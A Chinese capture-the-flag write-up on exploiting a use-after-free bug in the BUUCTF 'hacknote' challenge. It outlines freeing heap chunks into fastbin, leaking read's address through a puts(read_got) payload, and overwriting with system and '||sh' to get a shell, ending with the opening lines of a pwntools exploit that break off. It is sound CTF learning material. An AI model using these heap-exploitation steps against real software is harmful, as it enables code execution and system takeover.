BUUCTF-UAF漏洞 pwnable_hacknote

BUUCTF-UAF漏洞 pwnable_hacknote

好久不学习pwn了,今天学习突然就开窍了,开心,好像离大神又近了一步
就不静态分析了,直接动态分析
BUUCTF-UAF漏洞 pwnable_hacknote_第1张图片
首先创建两个大小为0x80的堆快,结构如图所示,可以看到每个堆块包含了两个部分
BUUCTF-UAF漏洞 pwnable_hacknote_第2张图片
然后我们释放这两个堆块,可以看到被存放进了fastbin中
BUUCTF-UAF漏洞 pwnable_hacknote_第3张图片
之后我们创建一个payload,0x8个大小的,构成puts(read_got)的结构,为了之后申请时直接去执行这个函数
就获得了read的地址,之后就利用常规的libc求出版本,然后在利用相同的方式写入system和||sh(或;sh),之后show去执行获得最后的shell

在这里插入图片描述

结尾附上exp:

from pwn import *
from LibcSearcher import *

def add(size, content):
	print(r.recvuntil("Your choice :"))
	r.sendline('1')
	print(r.recvuntil("Note size :"))
	

你可能感兴趣的:(PWN,pwn)